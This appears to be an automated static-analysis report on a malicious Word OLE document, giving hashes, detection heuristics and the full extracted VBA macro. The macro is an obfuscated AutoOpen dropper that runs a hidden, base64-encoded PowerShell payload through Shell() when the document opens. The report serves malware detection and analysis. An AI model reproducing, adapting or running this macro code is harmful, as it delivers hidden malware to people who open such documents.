Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f934cda10d7454a7…

MALICIOUS

Office (OLE)

Size: 90.5 KB
Created: 2018-06-01 08:53:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 455e0d304504155557fc662b2ffcede0
SHA-1: f2129bb6fbd6bbbb19e3b9d15f5996e6059d81a7
SHA-256: f934cda10d7454a7403bf5e3372ff4581300e07d6755c1c6ea79f0aaa1791423
Risk score: 242

Heuristics (7)

  • CLAMAV_DETECTION (critical): ClamAV: Doc.Dropper.Agent-6567903-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6567903-0
  • OLE_VBA_MACROS (medium, 3 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    Shell() call in VBA
    Matched line in script
    jEoJi = CSng(15980 * CInt(9274) + 37921 - 74822)
    qCHtznqwaWX = slqtcfJls + Shell(BVidaZSh + Chr(vbKeyP) + UoEdzMcBLl + iCwTk + ofNnY + CCEPIolX + jjWDFwJwSEi, PLVTX + vbHide + hcdJRZ)
    Yoanw = 1642 + Log(29548) - ViiwR / Atn(54315) / tzErWN / UEMltj
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
    AutoOpen macro
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10313 bytes
SHA-256: e99d9df43adc5036070c77a9d7f042d2b12ae4b13aad33670e102c6f1b58947a
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "TYnQjlOFSoE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qCHtznqwaWX()
On Error Resume Next
qKIXCX = 15075 + Log(65690) - Ukwad / Atn(35909) / akGjF / VQNYo
miIDDL = CSng(38432 * CInt(74338) + 18665 - 74314)
bbAjiv = 79004 + Log(68400) - sqhtk / Atn(65356) / ppsKii / wpMhvO
jEoJi = CSng(15980 * CInt(9274) + 37921 - 74822)
qCHtznqwaWX = slqtcfJls + Shell(BVidaZSh + Chr(vbKeyP) + UoEdzMcBLl + iCwTk + ofNnY + CCEPIolX + jjWDFwJwSEi, PLVTX + vbHide + hcdJRZ)
Yoanw = 1642 + Log(29548) - ViiwR / Atn(54315) / tzErWN / UEMltj
ZcWCX = CSng(73332 * CInt(79558) + 14479 - 78539)
End Function
Sub Autoopen()
On Error Resume Next
owOaj = 59432 + Log(67377) - LMlJAb / Atn(32354) / iTVaK / fNvCI
uqHlKE = CSng(6838 * CInt(48762) + 98960 - 37084)
qCHtznqwaWX
ZdwhXT = 31769 + Log(53642) - lPHVlO / Atn(80093) / RAihWo / VEAwvY
HLivzL = CSng(50905 * CInt(14674) + 88867 - 59442)
End Sub


Attribute VB_Name = "OIiimAwOXIw"
Function UoEdzMcBLl()
On Error Resume Next
FwjniG = 75769 + Log(59161) - ANiAm / Atn(14703) / uoBZrN / Yvzpc
QKoVd = CSng(42462 * CInt(63964) + 28886 - 66225)
DAYJfIkNwc = "owersHe" + "LL " + "-e KABuA" + "GUAdw"
mkRLs = 689 + Log(71122) - awHjKN / Atn(12134) / sjHriR / KoqZM
QaTMP = CSng(29760 * CInt(78452) + 50520 - 3229)
vRZHMAZrjN = "AtAG8AYg" + "BK" + "AGUAQwBUACAAIAB" + "JAE8ALgB"
YKAOf = 24996 + Log(63270) - aPmdBH / Atn(83121) / VZHXCb / cKWoX
wRQqIj = CSng(62202 * CInt(66798) + 4748 - 60753)
fIXzJTRslj = "DAG8A" + "TQBwAFIARQBzA" + "HMAaQBPAE4AL" + "gBkAGUARgB" + "MAGEAdABFAFMA"
Hqwzkm = 48489 + Log(23377) - auPTi / Atn(42147) / mXEJYJ / bzWmt
KHStJ = CSng(29439 * CInt(23025) + 55115 - 52910)
EFHqbd = "dABSAEUAYQBNACg" + "AWwBJAE8ALgB" + "tAEUAbQBvAFIAWQ" + "BTAHQAcg" + "BFAEEAT" + "QBdAC"
XwcCUE = 3733 + Log(95112) - mntLw / Atn(42195) / wkWzO / joKTbV
PJUKf = CSng(61926 * CInt(24662) + 93107 - 12775)
kmdFEovUm = "AAW" + "wBjAG8AbgBWAGU" + "AcgB0AF" + "0AOgA6AGYAcg" + "BPAE0" + "AYgB"
XwYaHj = 32486 + Log(92139) - XlQbF / Atn(54738) / YQnsBd / owcTjf
JcrAz = CSng(5842 * CInt(80407) + 47263 - 48241)
dbpATjNwKh = "hAFM" + "AZQA2ADQAcwBUA" + "HIASQBuA" + "GcAKAAnAFQAWgBI" + "AG" + "YAYQA5AHMAdwB"
UoEdzMcBLl = DAYJfIkNwc + vRZHMAZrjN + fIXzJTRslj + EFHqbd + kmdFEovUm + dbpATjNwKh
End Function
Function iCwTk()
On Error Resume Next
tXGwY = 97103 + Log(67167) - iBHwJ / Atn(27214) / uQkiiQ / QCOJZa
Znzri = CSng(98554 * CInt(58648) + 43257 - 64885)
TwXlU = "FAE0AZgB" + "mAEIALwAw" + "AGYAUg" + "BEAEMAVgBqAE" + "IAdABwAFQAVw" + "BDAFUAbQBrAEgA" + "YQBoAEkAMA" + "A4AE4ATgAxAHcAU" + "wBwAGUAeQ"
wtFAd = 20029 + Log(25083) - dREnF / Atn(89243) / oLGEjO / IHINH
bOEYi = CSng(39464 * CInt(61455) + 72236 - 22578)
zRwEvTbd = "BCADgAd" + "gB5A" + "HUAWABGA" + "GkAUwA4"
msBqvJ = 4232 + Log(73874) - FztnXS / Atn(96263) / YkzrQ / IrONj
kOIci = CSng(39733 * CInt(23022) + 65677 - 47480)
wGWWDj = "AGEAVwBrA" + "DMAWQBoA" + "C8ALwB2AHUAM" + "ABqAHgAVQA0AFAA" + "UAAzAH" + "AATQA5AHgAdgB3A"
zFWfCH = 63713 + Log(52214) - FkTHAN / Atn(79169) / pswjw / hzroR
CGPcu = CSng(72671 * CInt(85880) + 40912 - 71069)
UKbAjb = "EwAYgA" + "2AFYAe" + "AAzAE8AZg" + "B2A" + "E8ATABn" + "AFcAMwBQAE8ATAB" + "BAEkAOA" + "BIADM" + "AU" + "QA1AGQ"
BKnjb = 39439 + Log(33325) - IOpwW / Atn(79316) / zDjohL / PRdzU
MOVTlo = CSng(83275 * CInt(76096) + 86649 - 30627)
EjPRk = "AdAB" + "5AEQARQA" + "4AGoATABq" + "AG4A" + "SQ" + "BXAHU" + "AM"
NjjjCT = 8389 + Log(69008) - CziJjD / Atn(79773) / vVCbAa / ttVNhz
EnobAb = CSng(72546 * CInt(24845) + 96225 - 49164)
AijVpSDdi = "QB6AFYAMA" + "BkAEI" + "ANgB2AFYARQA3AE" + "kAU"
tpPjM = 75925 + Log(64602) - IsXNSM / Atn(12062) / nJwqCc / tvUEC
ziXcM = CSng(12563 * CInt(71294) + 61293 - 25348)
UEVBGImp = "wBXAFEAVAA1AG" + "4AdQBDA" + "GgAUQA1AFYAd" + "AB5AEQAZQBJA" + "GgAaQB4ADUA" + "NwB6AHoAVQBjAGc" + "ARgBlA" + "FAAawBNADIAc" + "gBVAHEAdwBQA" + "GcANABX"
hfipuj = 48976 + Log(42770) - umwDz / Atn(66608) / QZVkr / ilKKzk
GVJac = CSng(31639 * CInt(21333) + 38305 - 74624)
vwaMItf = "AHkAVAAxAEcAQg" + "B1AG" + "UARQAwAHMASwBiA" + "EYAOQBkAGYA" + "OABWAHkAe" + "AAwAGMAMwBvAGUA" + "agB3AE8A" + "NAArAEIAdQBOAHY" + "AMgBEAGsATwB" + "BAFgAWA"
MWzqH = 53768 + Log(98406) - YuzpLJ / Atn(55209) / zAzfjh / QIZdYa
XtiEJO = CSng(88537 * CInt(85975) + 44354 - 17678)
SfQTnirXX = "A5AGIAZQBOA" + "DcAZABLADc" + "AVABQAGQAVQ" + "B5AEcA" + "dABOAEsANgBXAE" + "cAYwBwAFcAc"
fbqGQ = 19289 + Log(98278) - nRKWHl / Atn(59567) / hhiwaE / WGLGAO
GdnUEF = CSng(95416 * CInt(18208) + 83402 - 29714)
CizLNLbP = "gBaAG" + "IAagBYA" + "HkAaQB" + "hAEIAegB"
iCwTk = TwXlU + zRwEvTbd + wGWWDj + UKbAjb + EjPRk + AijVpSDdi + UEVBGImp + vwaMItf + SfQTnirXX + CizLNLbP
End Function
Function ofNnY()
On Error Resume Next
anRNWW = 37861 + Log(59130) - MKoKkb / Atn(74652) / AFDwj / KjinhZ
YqTUAQ = CSng(44105 * CInt(17736) + 69153 - 78240)
DdbwBZEhT = "VADUA" + "VQBhAGkAVgBR" + "AHIATgB" + "4AEgAVABUAHIAd"
Vhivpd = 68842 + Log(54960) - dJlLf / Atn(84036) / HjnjmF / nUVpkK
LQQRd = CSng(2635 * CInt(18747) + 29005 - 83236)
YUtUtrM = "gBQAGMAZQ" + "BIAFMAcgBLAFUA" + "aABDADkARgBt" + "AGcAZQ" + "BmADcAdQBYA" + "GI" + "AN" + "QA4AGkAN"
DEGGP = 8611 + Log(14080) - IWPcwF / Atn(99974) / lvbTn / RCSsVu
qkspi = CSng(61830 * CInt(65526) + 97141 - 80543)
uFaiACf = "gBOAE8" + "AdABMADQARQBJAG" + "IAUwBX" + "AFYANw" + "AyAG8AMQBH" + "AHQAbQBrA" + "CsASABmA" + "G0AbA" + "BPAHEAZwB" + "xAHEARAB2"
POAbo = 376 + Log(66878) - LRNQO / Atn(76777) / RDmDo / jMnSl
mOYRR = CSng(90695 * CInt(43127) + 21482 - 10153)
cnzzzEhaGf = "AFoARQBm" + "AHQASwBaA" + "FAATQA4" + "AGIAZ" + "QA5AHUAeQBGA" + "G4AZwB1"
XdCjYJ = 56336 + Log(78449) - WERQcv / Atn(89520) / CjBMJ / cvFmz
VscSif = CSng(16919 * CInt(2600) + 10316 - 95168)
lPLUTiX = "AFoATQBvAGQAbw" + "BW" + "AE8ANwBSADkA" + "SgBuAE4AUQBMADg" + "AcwBHADk" + "AVQA5" + "AEM" + "AMg" + "A5AGUARgA0AHE"
jwsPT = 40323 + Log(95262) - WXtUiD / Atn(50821) / bZnTX / tEdbzm
mtvEHR = CSng(27330 * CInt(33444) + 75630 - 18004)
jjVXW = "AR" + "gBNA" + "G0AcQByADAA" + "ZwBr" + "ADgA" + "NABOAH" + "AAbgBNAHAAag" + "BRAEkAc" + "wBMAH" + "YAYgBw"
ofNnY = DdbwBZEhT + YUtUtrM + uFaiACf + cnzzzEhaGf + lPLUTiX + jjVXW
End Function
Function CCEPIolX()
On Error Resume Next
IqcYbY = 96813 + Log(28137) - RhbSi / Atn(4975) / FnlrV / AjdwP
lMznQ = CSng(23774 * CInt(21000) + 63425 - 2117)
lrzczk = "AHMAKwBxADAA" + "cg" + "BDAEkAOABi" + "ADg" + "AYwA3AFcAbA" + "BHAEUAUgBPAEMA"
dFdki = 59814 + Log(9543) - daEMI / Atn(57871) / RFzpt / dIbcrU
KFTVEk = CSng(18567 * CInt(61336) + 28236 - 70731)
hMkrrfjNOd = "VQ" + "B6AFgAdwBSAHMA" + "TQBIAEQAQwB" + "sAGMAQ" + "wA5AHEAcwBSAG" + "EAQwA3AHc" + "AcgBEA" + "FMAc" + "wB0AE8A"
UiMUpS = 48966 + Log(6381) - lzGNr / Atn(15057) / AzCIqK / HYGiH
UVCUU = CSng(40350 * CInt(28067) + 65647 - 16915)
DdnhM = "ZwB3AG8A" + "TgB2ADMAdw" + "ArADAA" + "RQB" + "UAG0AWQB1AGYAVA" + "Ba" + "AFYAdQBtAGoAe" + "gBuA"
IDoBI = 22579 + Log(97543) - iwJJi / Atn(24308) / lKTFwi / RiwQwm
Wtsrdt = CSng(9099 * CInt(4984) + 17761 - 5267)
YwpMHFEHmk = "C8ATQAwA" + "HcAbwBHAE" + "gANgBnA" + "GMATABGADMAaQ" + "Ay" + "ADcAUgB" + "NAEYA" + "NgA4AEQARQBW" + "ADQA" + "eAB5"
ZBELPL = 75145 + Log(81199) - iKucMl / Atn(47567) / JCrPMM / DQRFT
jBRJW = CSng(63183 * CInt(60183) + 11715 - 29152)
UpTXQJBJh = "AGgAMwBHAGwANQ" + "BpAEEAKwByAEEAN" + "wBSAHg" + "AbQAy" + "AHQARQBRAFkANAB" + "zA" + "Fg" + "AYwBVAD"
dFuKLw = 30236 + Log(59762) - USsGKf / Atn(25021) / vIwuiX / zJdTq
tfuPO = CSng(18409 * CInt(34817) + 2571 - 94602)
knWoP = "UAYwAxA" + "DcAbABCA" + "DgAawBCAG4AbQ" + "AzAGMAWgBIAG8AN" + "wAxAFoASA" + "A0ADcASAAvAHc" + "APQA9ACc" + "AIAApACwAWwBp" + "AG8ALgBDAG8"
AmMwF = 81341 + Log(89964) - iJrjw / Atn(31395) / viaLBU / pobnwq
WunwDz = CSng(15011 * CInt(41416) + 48206 - 28382)
BJOvfjZfGc = "AbQBQAFIAZQ" + "BTAFMAS" + "QBPAG" + "4ALgB" + "DAE8AT" + "QBQAHIARQBzAFM" + "ASQBPAG4AbQBP"
OXpjM = 19259 + Log(64737) - WTarqv / Atn(69535) / zYWRs / KHODk
SlZJLC = CSng(74578 * CInt(94978) + 14558 - 16442)
RjnUJ = "AEQ" + "ARQBdADoA" + "OgBEAE" + "UA" + "Yw" + "BvAG0AcA" + "BSAGUAc" + "wBzACkAfA" + "AgAEYAbwBSA" + "EUAQQB"
RFUTbv = 6324 + Log(95868) - StKzC / Atn(93874) / KMhRJ / mLluR
oImwow = CSng(10118 * CInt(23903) + 46118 - 70532)
iqHhMXSi = "DAEgALQ" + "BvAE" + "IA" + "agBF" + "AGMAVAAgAHs" + "AIABu" + "AG" + "UAdwAtAG8A" + "YgBKAGUAQw" + "BUACAAI"
MLFhcY = 51403 + Log(54382) - Okcka / Atn(82315) / sSIih / XJujwV
zktZi = CSng(39335 * CInt(12155) + 6182 - 83956)
pViLbY = "ABpAG8A" + "LgBTAHQAc" + "gBlAEEAbQBSAEUA" + "YQBkAEUAc" + "gAoACQ" + "AXwA"
CCEPIolX = lrzczk + hMkrrfjNOd + DdnhM + YwpMHFEHmk + UpTXQJBJh + knWoP + BJOvfjZfGc + RjnUJ + iqHhMXSi + pViLbY
End Function
Function jjWDFwJwSEi()
On Error Resume Next
nKSJQ = 6091 + Log(62491) - WziNt / Atn(30460) / Biovn / bEbKir
GGkPA = CSng(15612 * CInt(40267) + 45246 - 29449)
JXSHO = "sACAAWwBUAEU" + "AWAB0AC4AZ" + "QBuAGM" + "AbwBkAEkAbgBnA"
GGNda = 46145 + Log(41980) - qdXdmS / Atn(13875) / OLFqz / LivQNP
luilN = CSng(64663 * CInt(79471) + 48634 - 34346)
wmFhJi = "F0AOgA6AEEAcwBD" + "AGkAaQAgAC" + "kAI" + "AB9ACAAf" + "AAgA" + "EYAbwBy"
jGanO = 59577 + Log(56372) - SHwtJ / Atn(33966) / UTvji / KGXFi
rYkRfz = CSng(20170 * CInt(48101) + 69365 - 48783)
vQODFa = "AEUAQQBjAGgA" + "LQ" + "BPAGIA" + "SgBFAGMAdAB7AC" + "AA" + "JABfA" + "C4Acg" + "BlAEE"
zzSwvH = 31758 + Log(85110) - NMsNup / Atn(68777) / WzCifm / vhqQww
pvVzkP = CSng(27708 * CInt(29611) + 98408 - 13370)
PFOzzPij = "AZABUAE8" + "ARQBuA" + "GQAKAApAH0AI" + "AApACAAfA" + "Ag" + "ACYA" + "KAAg" + "ACgAWwBzAFQ"
zfifW = 45577 + Log(80185) - UCkWQ / Atn(33765) / jANRz / mUXzsw
UbGAv = CSng(41282 * CInt(66725) + 13863 - 14819)
UKaUbZQzQzO = "AcgBJAE4ARw" + "BdACQAVgB" + "lAFIAYgB" + "PAHMAZQBwA" + "FIARQBGAGU"
KSbii = 80579 + Log(8829) - FjYjN / Atn(3350) / HQKKGi / bktsvk
uiFYkD = CSng(97845 * CInt(46988) + 25108 - 14586)
YpPBEwh = "AcgBlAE4AQwBF" + "ACkAWwAxACw" + "AMwBdACsAJwBY" + "ACcALQBKAE8A" + "aQBOACcAJwApA" + "A=="
jjWDFwJwSEi = JXSHO + wmFhJi + vQODFa + PFOzzPij + UKaUbZQzQzO + YpPBEwh
End Function